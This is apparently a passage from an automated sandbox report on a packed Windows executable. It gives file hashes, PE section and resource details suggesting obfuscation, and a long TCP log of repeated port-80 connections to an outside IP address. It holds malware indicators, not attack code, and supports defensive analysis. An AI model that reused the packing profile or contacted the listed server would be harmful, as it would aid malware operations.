                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                  Malicious:false
                                  Preview:0

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421544473090592
                                  Encrypted:false
                                  SSDEEP:6144:USvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNF0uhiTw:fvloTMW+EZMM6DFyL03w
                                  MD5:6A46D8B1A39569CCBFC04195B7D08801
                                  SHA1:B95975F0BB95BC3D66BB88D840EF0FB700588FAD
                                  SHA-256:D1AB3D691D5742561BD9A9C47168D34195F131DC4ED6F6F4038F7EAD6C2C146F
                                  SHA-512:12E7922003F1465C3D80D4D253BD7BD45B4F29D4AFDF8AC1D0FBF520C5F0C4ED325B16DD569889E8CE1BB9D073CF039841F37B2078BEF5494610078568AE49CC
                                  Malicious:false
                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2..8.R..............................................................................................................................................................................................................................................................................................................................................a:..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.9415752137965
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:4kahanaK78.exe
                                  File size:1'933'312 bytes
                                  MD5:3c2e26d10fa55af2e913120df3b7eddb
                                  SHA1:a6ba8c6378d44616d7196331c6ea54e286136ce6
                                  SHA256:4463effeb9799edfe6c07776f1e044718792fabb6ea103b9ee016e5efd21a985
                                  SHA512:be0d54efddd550dd9acc996df86ff2dc86a8fb50aa84e7d018736d16e06a97c746c2a3b92f70b56773fa791fe3b6ba365d676ed7683cd8f82738b2743d2a82c6
                                  SSDEEP:49152:kA8icQ8TAFCy7gjmjVD6Gd1R6ESxZ9MswgY+YP7Mnr:YNFyM4VmIDS39MrGk7M
                                  TLSH:F495336F6ED11688CDA302368CFEC02003ADB27FD426EFA76855861ADEF843767D5121
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

                                  File Icon

                                  Icon Hash:e7a99a8a8651790c

                                  Static PE Info

                                  General

                                  Entrypoint:0xc58000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                  Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0E0506114Ah
                                  divps xmm3, dqword ptr [00000000h]
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2008 build 21022
                                  • [ASM] VS2008 build 21022
                                  • [ C ] VS2008 build 21022
                                  • [IMP] VS2005 build 50727
                                  • [RES] VS2008 build 21022
                                  • [LNK] VS2008 build 21022

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x41805b0x6f.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40d0000xaea0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x84f8940x18bqzwvadu
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x40c0000x24e00946c5dd01022c1c2772e91561195811bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x40d0000xaea00x7000a9c31158c7d64ad7bcf22ff2db82fd1aFalse0.9677036830357143data7.892251172950252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x4180000x10000x200b8539b83d0b3f253ed2a56b71af0554bFalse0.154296875data1.085758102617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x4190000x2950000x200ac7cd5ba6236978d99eefdd0da13dd7cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  bqzwvadu0x6ae0000x1a90000x1a86001491ba212e8b8de30169cac4faae0eadFalse0.9901198913843888data7.948647238498833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  gbufcztg0x8570000x10000x600e9b3a93672082bc0915a0a37e864e70aFalse0.5631510416666666data5.018851124211002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x8580000x30000x2200f817d0c44529368b6e411a8447409ea2False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x84f8f40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.7971748400852878
                                  RT_ICON0x85079c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.7838447653429603
                                  RT_ICON0x8510440x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7200460829493087
                                  RT_ICON0x85170c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.740606936416185
                                  RT_ICON0x851c740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.6840248962655602
                                  RT_ICON0x85421c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.7345215759849906
                                  RT_ICON0x8552c40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.7622950819672131
                                  RT_ICON0x855c4c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8111702127659575
                                  RT_STRING0x413c800x330data0.8370098039215687
                                  RT_STRING0x413fb00x170data0.15
                                  RT_STRING0x4141200x620empty0
                                  RT_STRING0x4147400x762empty0
                                  RT_STRING0x414ea40x852empty0
                                  RT_STRING0x4156f80x726empty0
                                  RT_STRING0x415e200x658empty0
                                  RT_STRING0x4164780x6c0empty0
                                  RT_STRING0x416b380x638empty0
                                  RT_STRING0x4171700x88aempty0
                                  RT_ACCELERATOR0x4179fc0x20empty0
                                  RT_GROUP_ICON0x8560b40x76dataTurkmenTurkmenistan0.6610169491525424
                                  RT_VERSION0x85612a0x1b4data0.5711009174311926
                                  RT_MANIFEST0x8562de0x256ASCII text, with CRLF line terminators0.5100334448160535

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  TurkmenTurkmenistan

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 20, 2024 16:37:49.985579014 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:50.105441093 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:50.105684042 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:50.105938911 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:50.226643085 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:51.585705996 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:51.585849047 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:51.595069885 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:51.714787960 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.120620012 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.120786905 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.126172066 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.245748043 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747107029 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747183084 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747215986 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747234106 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747256994 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747272015 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747422934 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747440100 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747458935 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747464895 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747478008 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.747481108 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747499943 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.747515917 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.748111010 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.748156071 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.755369902 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.755434036 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.755616903 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.755676031 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.763876915 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.763942957 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.763942003 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.763991117 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.944946051 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.944993019 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.945079088 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.945115089 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.947216988 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.947283983 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.947376013 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.947539091 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.955174923 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.955296040 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.955388069 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.955447912 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.963172913 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.963263988 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.963310003 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.963395119 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.971180916 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.971447945 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.971628904 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.971704960 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.979140043 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.979226112 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.979270935 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.979321957 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.987063885 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.987140894 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.987221956 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.987271070 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.995100975 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.995194912 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:52.995620012 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:52.995690107 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.003034115 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.003117085 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.003154993 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.003205061 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.011120081 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.011213064 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.011225939 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.011254072 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.019020081 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.019104004 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.019360065 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.019419909 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.026997089 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.027034044 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.027065992 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.027090073 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.064889908 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.065041065 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.137592077 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.137670994 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.137753010 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.137840033 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.140908003 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.140968084 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.141100883 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.141146898 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.147346973 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.147404909 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.147519112 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.147655010 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.153966904 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.154022932 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.154289961 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.154333115 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.160289049 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.160377026 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.161087036 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.161134958 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.166054964 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.166121960 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.166142941 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.166182041 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.172699928 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.172805071 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.173537016 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.173589945 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.177825928 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.177872896 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.178267956 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.178325891 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.183721066 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.183793068 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.183801889 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.183845997 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.189667940 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.189728975 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.189795017 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.189838886 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.195441008 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.195499897 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.195714951 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.195839882 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.201442957 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.201514006 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.201555014 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.201600075 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.204868078 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.204919100 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.204922915 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.204962015 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.208417892 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.208456993 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.208508015 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.208529949 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.211819887 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.211875916 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.212035894 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.212083101 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.215262890 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.215337038 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.215512991 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.215564966 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.218832970 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.218889952 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.218905926 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.218959093 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.222259998 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.222316027 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.222392082 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.222438097 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.225830078 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.225894928 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.226103067 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.226150990 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.229372978 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.229435921 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.229492903 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.229542017 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.232995987 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.233055115 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.233308077 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.233356953 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.236287117 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.236378908 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.236773014 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.236820936 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.258409977 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:53.378026009 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.790546894 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:53.790627956 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:55.819197893 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:55.939131021 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:56.648529053 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:56.648646116 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:58.662985086 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:37:58.782972097 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:59.193500042 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:37:59.193648100 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:01.209920883 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:01.330019951 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:02.036369085 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:02.036478996 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:04.053390026 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:04.172966957 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:04.619503975 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:04.619611979 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:06.631625891 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:06.751183987 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:07.462344885 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:07.462409973 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:09.475513935 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:09.476032972 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:09.595649004 CET8049839185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:09.595818043 CET8049793185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:09.595819950 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:09.595885038 CET4979380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:09.596317053 CET4983980192.168.2.5185.156.73.23
